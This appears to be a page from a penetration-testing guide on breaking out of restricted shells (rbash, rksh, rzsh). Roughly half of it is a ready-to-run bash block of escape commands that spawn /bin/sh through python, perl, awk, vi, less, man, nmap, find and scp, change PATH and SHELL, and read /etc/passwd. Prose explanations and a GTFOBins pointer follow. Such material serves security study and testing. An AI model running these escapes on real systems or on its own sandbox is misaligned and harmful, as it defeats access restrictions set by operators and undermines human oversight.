6.Escaping-restricted-shells

Restricted Shell Escape Attempts

```bash
# 1. Check the restricted shell type (if possible)
# (Often, this is not directly visible)

# 2. Enumerate allowed commands (try common ones)
ls
pwd
whoami
id
echo $PATH
env
# Try other basic commands

# 3. Test command substitution
ls -l `pwd`
ls -l $(pwd)
echo `whoami`
echo $(whoami)

# 4. Test command chaining
ls; whoami
pwd && id
echo 1 || echo 2
cat /etc/passwd | grep root

# 5. Test environment variable manipulation (if possible)
echo $PATH
export PATH=/bin:/usr/bin:/sbin:/usr/sbin
echo $PATH
echo $SHELL
export SHELL=/bin/bash
$SHELL # Try to spawn a new shell

# 6. Test shell function creation (if possible)
function test { /bin/bash; }
test

# 7. Try common escape binaries (if available)
sh
bash
python -c 'import os; os.system("/bin/sh")'
perl -e 'exec "/bin/sh";'
ruby -e 'exec "/bin/sh"'
awk 'BEGIN {system("/bin/sh")}'
vi
nano
tmux
screen
less /etc/passwd # Then !/bin/sh
nmap --interactive # Then !sh
find / -exec /bin/sh \; 

# 8. If vi is available
vi
# Then:
# :!/bin/sh
# or
# :set shell=/bin/bash
# :shell

# 9. GTFObins Check (Manual - Check allowed binaries against GTFObins)
# Example: If 'more' is allowed, check GTFObins for 'more'
# Example: If 'scp' is allowed, check GTFObins for 'scp'
# Example: If 'man' is allowed, check GTFObins for 'man'

# Example: If 'more' is allowed, and GTFObins shows an escape:
more /etc/passwd
:!/bin/sh

# Example: If 'man' is allowed, and GTFObins shows an escape:
man man
:!/bin/sh

# Example: If 'scp' is allowed, and GTFObins shows an escape:
scp user@host:/dev/null /dev/null -S /bin/sh

Understanding Restricted Shells

  • Purpose:

    • Limit user capabilities for security.

    • Prevent accidental or intentional system damage.

    • Control access to specific system features.

  • Common Types:

    • rbash (Restricted Bourne shell)

    • rksh (Restricted Korn shell)

    • rzsh (Restricted Z shell)

  • Restrictions:

    • Limited command execution.

    • Restricted directory access.

    • Disabled environment variable modification.

    • Prevented shell function creation.

Escaping Techniques

The document outlines several methods, which can be summarized and expanded upon:

  • Command Injection:

    • Exploiting vulnerabilities where user input is directly used in command execution.

    • Example: ls -l \pwd`` (using backticks for command substitution).

    • This is very dependent on the specific implementation of the restricted shell.

  • Command Substitution:

    • Using backticks () or $(command)` to execute commands within other commands.

    • If the restricted shell allows any form of command substitution, it can often be abused.

  • Command Chaining:

    • Using ;, &&, ||, or | to execute multiple commands in sequence.

    • If the shell allows any of these, it may be possible to chain an allowed command with an escape command.

  • Environment Variables:

    • Manipulating variables like PATH or SHELL to execute unauthorized commands.

    • If the shell allows any modification of environment variables, this is a very common method of escape.

  • Shell Functions:

    • Defining custom functions to bypass restrictions.

    • If function definitions are possible, this is a very powerful way to escape.

Practical Considerations

  • Specific Restrictions: The effectiveness of these techniques depends entirely on the specific restrictions imposed by the restricted shell.

  • Enumeration: Thoroughly enumerate the shell's limitations. What commands are allowed? What environment variables exist?

  • Binary Exploitation: If standard escape methods fail, consider if any allowed binaries have known vulnerabilities.

  • GTFObins: GTFObins is an excellent resource for finding ways to abuse common Linux binaries. Many of these techniques can be used to escape restricted shells.

  • Common Escape Commands:

    • sh, bash, python, perl, ruby, awk, vi, nano, tmux, screen and many more. If any of these are available, they are very often used to escape.

Example scenarios and commands

  • If vi is available: :!/bin/sh

  • If Python is available: python -c 'import os; os.system("/bin/sh")'

  • If Perl is available: perl -e 'exec "/bin/sh";'

  • If less is available: !/bin/sh

  • If nmap is available: !sh inside of an interactive nmap session.

  • If find is available: find / -exec /bin/sh \;

Previous5.Wildcard-abuseNext3.Permissions-based Privilege Escalation

Last updated